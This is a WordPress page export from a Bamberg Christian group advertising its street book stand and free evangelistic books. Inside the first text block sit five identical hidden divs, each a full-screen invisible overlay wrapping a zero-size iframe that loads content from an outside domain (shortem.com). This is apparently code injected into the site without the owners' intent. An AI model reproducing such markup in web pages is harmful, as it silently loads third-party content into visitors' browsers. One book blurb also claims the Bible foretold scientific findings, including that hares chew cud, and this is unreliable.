{"id":30,"date":"2013-09-12T22:07:28","date_gmt":"2013-09-12T20:07:28","guid":{"rendered":"http:\/\/christen-bamberg.de\/wordpress\/?page_id=30"},"modified":"2019-09-14T18:44:25","modified_gmt":"2019-09-14T16:44:25","slug":"buecherstand","status":"publish","type":"page","link":"https:\/\/www.christen-bamberg.de\/?page_id=30","title":{"rendered":"B\u00fccherstand"},"content":{"rendered":"<div id=\"pl-30\"  class=\"panel-layout\" >\n<div id=\"pg-30-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\" >\n<div id=\"pgc-30-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" >\n<div id=\"panel-30-0-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-2681\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/20190622_110857-1024x425.jpg\" alt=\"\" width=\"625\" height=\"259\" data-id=\"2681\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/20190622_110857.jpg 1024w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/20190622_110857-300x125.jpg 300w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/20190622_110857-768x319.jpg 768w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/20190622_110857-624x259.jpg 624w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/p>\n<p style=\"text-align: justify;\">In der Zeit von 9:00 bis ca 15:00 Uhr haben wir an mehreren Samstagen im Jahr einen Informations-Stand mit Brosch\u00fcren und B\u00fcchern in der Bamberger Fu\u00dfg\u00e4ngerzone auf dem Maximiliansplatz stehen. Auch dort k\u00f6nnen Sie gerne vorbei kommen und sich mit uns unterhalten.<\/p>\n<p style=\"text-align: justify;\">Falls Sie uns nicht am Informations-Stand besuchen k\u00f6nnen, aber dennoch ein Buch haben m\u00f6chten, k\u00f6nnen Sie dies gerne jederzeit \u00fcber unser<a href=\"https:\/\/www.christen-bamberg.de\/?page_id=34\"><span style=\"color: #333333;\"> Kontaktformular\u00a0<\/span><\/a> tun. Wir schicken Ihnen dann kostenlos Ihr gew\u00fcnschtes Buch\/B\u00fccher zu.<\/p>\n<p>Auch besteht bei einigen B\u00fcchern die M\u00f6glichkeit, diese als kostenlosen Download im PDF Format zu erhalten. Hinweise hierzu finden Sie unter dem jeweiligen Buch.<\/p>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/shortem.com\/w\/whitelisted\/\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/shortem.com\/w\/whitelisted\/\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/shortem.com\/w\/whitelisted\/\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/shortem.com\/w\/whitelisted\/\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/shortem.com\/w\/whitelisted\/\"><\/iframe><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"pg-30-1\"  class=\"panel-grid panel-no-style\" >\n<div id=\"pgc-30-1-0\"  class=\"panel-grid-cell\"  data-weight=\"0.270422535211\" >\n<div id=\"panel-30-1-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-289\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/10\/fragw\u00fcrdig.jpg\" alt=\"\" width=\"409\" height=\"665\" data-id=\"289\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/10\/fragw\u00fcrdig.jpg 409w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/10\/fragw\u00fcrdig-184x300.jpg 184w\" sizes=\"auto, (max-width: 409px) 100vw, 409px\" \/><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-30-1-1\"  class=\"panel-grid-cell\"  data-weight=\"0.729577464789\" >\n<div id=\"panel-30-1-1-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child\" data-index=\"2\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<h3 class=\"widget-title\">Fragw\u00fcrdig<\/h3>\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\">\u00bbMan sagte mir, dass ich einfach glauben sollte \u2026 Als ich an die Hochschule kam, entdeckte ich, dass andere Menschen dieselben Fragen hatten und keine Antworten \u2013 und so wurde ich Atheist.\u00ab (Studentin aus Texas)<\/p>\n<p style=\"text-align: justify;\">\u00ad- Gibt es wirklich Beweise daf\u00fcr, dass Gott existiert?<\/p>\n<p style=\"text-align: justify;\">-\u00ad Ist die Bibel nicht nur ein ganz gew\u00f6hnliches Buch?<\/p>\n<p style=\"text-align: justify;\">-\u00ad Kann ich denn nicht selbst bestimmen, was f\u00fcr mich richtig ist?<\/p>\n<p style=\"text-align: justify;\">-\u00ad War Jesus nicht nur ein bedeutender Lehrer?<\/p>\n<p style=\"text-align: justify;\">-\u00ad Ist es nicht langweilig und einengend, Christ zu sein?<\/p>\n<p style=\"text-align: justify;\">FRAGW\u00dcRDIG ist ein Buch f\u00fcr den gesunden Menschenverstand mit herausfordernden Informationen \u00fcber die Grundlagen des christlichen Glaubens. Tom Short nennt schwerwiegende Gr\u00fcnde, \u00fcber Jesus Christus und die Bibel in einem ganz neuen Licht nachzudenken.<\/p>\n<p style=\"text-align: justify;\">Aber Vorsicht! Du wirst entdecken, dass der christliche Glaube wirklich schl\u00fcssig ist, und dann wirst du dich vor die wichtigste aller Fragen gestellt sehen!<\/p>\n<\/div>\n<\/div>\n<div id=\"panel-30-1-1-1\" class=\"so-panel widget widget_origin_button panel-last-child\" data-index=\"3\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><\/div>\n<\/div>\n<\/div>\n<div id=\"pg-30-2\"  class=\"panel-grid panel-no-style\" >\n<div id=\"pgc-30-2-0\"  class=\"panel-grid-cell\"  data-weight=\"0.270422535211\" >\n<div id=\"panel-30-2-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"4\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-87\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/09\/NT_255471z1_480.jpg\" alt=\"\" width=\"218\" height=\"340\" data-id=\"87\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/09\/NT_255471z1_480.jpg 218w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/09\/NT_255471z1_480-192x300.jpg 192w\" sizes=\"auto, (max-width: 218px) 100vw, 218px\" \/><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-30-2-1\"  class=\"panel-grid-cell\"  data-weight=\"0.729577464789\" >\n<div id=\"panel-30-2-1-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child\" data-index=\"5\" >\n<h3 class=\"widget-title\">Das Neue Testament<\/h3>\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\"><strong>Aus dem Buch der B\u00fccher: Das NT (zweiter Teil der Bibel)<\/strong><br \/> Jedes Haushaltsger\u00e4t hat eine Gebrauchsanleitung, jeder Fernseher, jedes Auto usw. F\u00fcr alles, was der Mensch macht, gibt es eine Dokumentation oder Hilfe. Aber was ist mit uns selbst, die wir so komplex sind? Reicht da ein Gesetz, von einer Regierung erlassen, um alle unsere Bed\u00fcrfnisse zu regeln? Das \u00c4u\u00dfere unseres Zusammenlebens wird scheinbar geregelt, aber was ist mit meinem Herzen und meiner Seele? Gott hat nicht zur\u00fcckgehalten, uns die Gebrauchsanweisung f\u00fcr unser Leben zukommen zu lassen. Erprobt, bew\u00e4hrt und wahrhaftig ist es nicht umsonst der Bestseller aller je geschriebenen B\u00fccher&#8230;<\/p>\n<\/div>\n<\/div>\n<div id=\"panel-30-2-1-1\" class=\"so-panel widget widget_origin_button panel-last-child\" data-index=\"6\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><\/div>\n<\/div>\n<\/div>\n<div id=\"pg-30-3\"  class=\"panel-grid panel-no-style\" >\n<div id=\"pgc-30-3-0\"  class=\"panel-grid-cell\"  data-weight=\"0.270422535211\" >\n<div id=\"panel-30-3-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"7\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-86\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/09\/M\u00e4dchen_24170_480.jpg\" alt=\"\" width=\"278\" height=\"345\" data-id=\"86\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/09\/M\u00e4dchen_24170_480.jpg 278w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/09\/M\u00e4dchen_24170_480-241x300.jpg 241w\" sizes=\"auto, (max-width: 278px) 100vw, 278px\" \/><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-30-3-1\"  class=\"panel-grid-cell\"  data-weight=\"0.729577464789\" >\n<div id=\"panel-30-3-1-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child\" data-index=\"8\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<h3 class=\"widget-title\">Ein M\u00e4dchen auf der Suche nach Liebe<\/h3>\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\">Die Autorin beschreibt ihre Geschichte mit Loveparade, Gras und Psychiatrie, und wie sie schlie\u00dflich Liebe gefunden hat. Die Erlebnisse sind ersch\u00fctternd \u2013 aber machen auch Mut.<br \/>\nVon der anderen Seite (das gedruckte Buch hat n\u00e4mlich zwei Anf\u00e4nge) stehen kurze Beitr\u00e4ge \u00fcber Beziehungen, den Wert des Lebens, Essst\u00f6rungen, Ritzen\u2026 Und ganz ehrliche Berichte, wie es m\u00f6glich ist, frei zu werden. Alles liebevoll illustriert \u2013 eben ein echtes Liebes-Buch!<\/div>\n<\/div>\n<div id=\"panel-30-3-1-1\" class=\"so-panel widget widget_origin_button panel-last-child\" data-index=\"9\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><\/div>\n<\/div>\n<\/div>\n<div id=\"pg-30-4\"  class=\"panel-grid panel-no-style\" >\n<div id=\"pgc-30-4-0\"  class=\"panel-grid-cell\"  data-weight=\"0.270422535211\" >\n<div id=\"panel-30-4-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"10\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-88\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2013\/09\/rockimsarg_480.jpg\" alt=\"\" width=\"183\" height=\"275\" data-id=\"88\" \/><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-30-4-1\"  class=\"panel-grid-cell\"  data-weight=\"0.729577464789\" >\n<div id=\"panel-30-4-1-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child\" data-index=\"11\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<h3 class=\"widget-title\">Rock im Sarg<\/h3>\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\">Lebe schnell,<br \/>\nsterbe jung,<br \/>\nhinterlasse einen gutaussehenden K\u00f6rper!<\/p>\n<p style=\"text-align: justify;\">33 Rockstars, die Vollgas gaben. Die den Rahmen sprengten. Sie wollten raus aus der Uniform ihrer Elterngeneration und endeten dann doch wieder alle gleich. Allesamt wollten sie leben. Und zwar nicht nur ein bisschen.<\/p>\n<p style=\"text-align: justify;\">Dieses Buch erz\u00e4hlt die Geschichten vom schnellen Leben der Rocker, die faszinierend und tragisch zugleich Musikgeschichte schrieben. Elvis, Lennon, Cobain, Hendrix&#8230;ohne sie w\u00e4re die Welt heute eine andere.<\/p>\n<\/div>\n<\/div>\n<div id=\"panel-30-4-1-1\" class=\"so-panel widget widget_origin_button panel-last-child\" data-index=\"12\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><\/div>\n<\/div>\n<\/div>\n<div id=\"pg-30-5\"  class=\"panel-grid panel-no-style\" >\n<div id=\"pgc-30-5-0\"  class=\"panel-grid-cell\"  data-weight=\"0.270422535211\" >\n<div id=\"panel-30-5-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"13\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-857\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2015\/01\/MSnW2015_cover01-50.jpg\" alt=\"\" width=\"636\" height=\"952\" data-id=\"857\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2015\/01\/MSnW2015_cover01-50.jpg 636w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2015\/01\/MSnW2015_cover01-50-200x300.jpg 200w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2015\/01\/MSnW2015_cover01-50-624x934.jpg 624w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-30-5-1\"  class=\"panel-grid-cell\"  data-weight=\"0.729577464789\" >\n<div id=\"panel-30-5-1-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child\" data-index=\"14\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<h3 class=\"widget-title\">Meine Suche nach Wahrheit<\/h3>\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\">Irgendwann m\u00f6chte jeder die Kl\u00e4rung nach dem Sinn und Ziel des Lebens, und sich dann mit nichts weniger zufrieden geben als der Wahrheit. Was kommt nach dem Tod? Gibt es einen \u201eHimmel\u201c? Und wenn ja, wie findet man dorthin? Auf diese und andere Fragen finden Sie hier Antworten.<\/p>\n<\/div>\n<\/div>\n<div id=\"panel-30-5-1-1\" class=\"so-panel widget widget_origin_button panel-last-child\" data-index=\"15\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><\/div>\n<\/div>\n<\/div>\n<div id=\"pg-30-6\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\" >\n<div id=\"pgc-30-6-0\"  class=\"panel-grid-cell\"  data-weight=\"0.268041237113\" >\n<div id=\"panel-30-6-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"16\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\"><img loading=\"lazy\" decoding=\"async\" data-id=\"2607\"  src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/2554251-625x1024.jpg\" alt=\"\" width=\"625\" height=\"1024\" class=\"alignnone size-large wp-image-2607\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/2554251-625x1024.jpg 625w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/2554251-183x300.jpg 183w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/2554251-768x1258.jpg 768w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/2554251-624x1022.jpg 624w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/2554251.jpg 1298w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-30-6-1\"  class=\"panel-grid-cell\"  data-weight=\"0.731958762887\" >\n<div id=\"panel-30-6-1-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child\" data-index=\"17\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<h3 class=\"widget-title\">Wenn Gott frei macht<\/h3>\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\">Dass Jesus gelebt hat, ist historisch besser belegt als die Existenz jeder anderen Person. Aber was hat das mit uns zu tun?<br \/>\nSechs Leute erz\u00e4hlen von den erstaunlichen Auswirkungen ihrer Begegnung mit dem Auferstandenen.<\/p>\n<p><strong>Eckhard Schitter \u2013 Unternehmer<\/strong><br \/>\nwollte sein Leben durch Para-Wissenschaften und New-Age-Philosophien in den Griff bekommen. Der Erfolg war m\u00e4\u00dfig. Er hatte wohl auf die falschen Retter gesetzt \u2026<\/p>\n<p><strong>Annemarie Kendlbacher \u2013 Hausfrau<\/strong><br \/>\nhatte nicht vorgehabt, sechs M\u00e4nnern den Haushalt zu f\u00fchren. Sp\u00e4ter fand sie, dass sie einiges nachzuholen habe.<\/p>\n<p><strong>Esther Janzen \u2013 Physiotherapeutin<\/strong><br \/>\nzweifelte sehr daran, ob Gott es gut mit ihr meinen konnte, obwohl er den Tod ihres Bruders zugelassen hatte. &#8230;<\/p>\n<p>&nbsp;<\/p><\/div>\n<\/div>\n<div id=\"panel-30-6-1-1\" class=\"so-panel widget widget_origin_button panel-last-child\" data-index=\"18\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><\/div>\n<\/div>\n<\/div>\n<div id=\"pg-30-7\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\" >\n<div id=\"pgc-30-7-0\"  class=\"panel-grid-cell\"  data-weight=\"0.26868556701\" >\n<div id=\"panel-30-7-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"19\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2617\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/255573_jesus_unser_schiksal_tb_3d_01.png\" alt=\"\" width=\"388\" height=\"665\" data-id=\"2617\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/255573_jesus_unser_schiksal_tb_3d_01.png 388w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/255573_jesus_unser_schiksal_tb_3d_01-175x300.png 175w\" sizes=\"auto, (max-width: 388px) 100vw, 388px\" \/><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-30-7-1\"  class=\"panel-grid-cell\"  data-weight=\"0.73131443299\" >\n<div id=\"panel-30-7-1-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child\" data-index=\"20\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<h3 class=\"widget-title\">Jesus unser Schicksal<\/h3>\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\">Jesus unser Schicksal \u2013 das war das von Pastor Wilhelm Busch gew\u00e4hlte Generalthema seiner ganzen Verk\u00fcndigung. Er war mit gro\u00dfer Freude Jugendpfarrer in Essen, aber als leidenschaftlicher Prediger des Evangeliums auch immer wieder unterwegs. Tausende kamen und h\u00f6rten ihm zu. Er war \u00fcberzeugt, dass das Evangelium von Jesus die wichtigste Botschaft aller Zeiten ist.<\/p>\n<\/div>\n<\/div>\n<div id=\"panel-30-7-1-1\" class=\"so-panel widget widget_origin_button panel-last-child\" data-index=\"21\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><\/div>\n<\/div>\n<\/div>\n<div id=\"pg-30-8\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;,&quot;cell_alignment&quot;:&quot;flex-start&quot;}\" >\n<div id=\"pgc-30-8-0\"  class=\"panel-grid-cell\"  data-weight=\"0.269329896907\" >\n<div id=\"panel-30-8-0-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child panel-last-child\" data-index=\"22\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<div class=\"textwidget\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2630\" src=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/256257_bibel_und_wissenschaft_-_pb_3d_01.png\" alt=\"\" width=\"430\" height=\"665\" data-id=\"2630\" srcset=\"https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/256257_bibel_und_wissenschaft_-_pb_3d_01.png 430w, https:\/\/www.christen-bamberg.de\/wordpress\/wp-content\/uploads\/2019\/06\/256257_bibel_und_wissenschaft_-_pb_3d_01-194x300.png 194w\" sizes=\"auto, (max-width: 430px) 100vw, 430px\" \/><\/div>\n<\/div>\n<\/div>\n<div id=\"pgc-30-8-1\"  class=\"panel-grid-cell\"  data-weight=\"0.730670103093\" >\n<div id=\"panel-30-8-1-0\" class=\"so-panel widget widget_black-studio-tinymce widget_black_studio_tinymce panel-first-child\" data-index=\"23\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >\n<h3 class=\"widget-title\">Bibel und Wissenschaft &#8211; Die Forschung hat Versp\u00e4tung<\/h3>\n<div class=\"textwidget\">\n<p style=\"text-align: justify;\">Vergleicht man Bibel und Wissenschaft, so stellt man fest: Die Bibel war der Forschung in zahlreichen Aussagen lange voraus. Es brauchte Jahrtausende, bis man zum Beispiel folgende biblische Aussagen wissenschaftlich best\u00e4tigen konnte:<\/p>\n<p>\u2013 Die Erde h\u00e4ngt \u00fcber dem Nichts.<br \/>\n\u2013 Die Sterne sind unz\u00e4hlbar.<br \/>\n\u2013 Der Hase k\u00e4ut wieder.<br \/>\n\u2013 Der Embryo besitzt im Anfangsstadium Kn\u00e4uelform.<br \/>\n\u2013 Die Luft hat ein Gewicht.<\/p>\n<p>Dieses Buch zeigt rund 30 Beispiele, in denen die Wissenschaft gegen\u00fcber der Bibel Versp\u00e4tung hatte.<\/p><\/div>\n<\/div>\n<div id=\"panel-30-8-1-1\" class=\"so-panel widget widget_origin_button panel-last-child\" data-index=\"24\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>In der Zeit von 9:00 bis ca 15:00 Uhr haben wir an mehreren Samstagen im Jahr einen Informations-Stand mit Brosch\u00fcren und B\u00fcchern in der Bamberger Fu\u00dfg\u00e4ngerzone auf dem Maximiliansplatz stehen. Auch dort k\u00f6nnen Sie gerne vorbei kommen und sich mit uns unterhalten. Falls Sie uns nicht am Informations-Stand besuchen k\u00f6nnen, aber dennoch ein Buch haben [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/full-width.php","meta":{"footnotes":""},"class_list":["post-30","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/pages\/30","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30"}],"version-history":[{"count":175,"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/pages\/30\/revisions"}],"predecessor-version":[{"id":2902,"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=\/wp\/v2\/pages\/30\/revisions\/2902"}],"wp:attachment":[{"href":"https:\/\/www.christen-bamberg.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}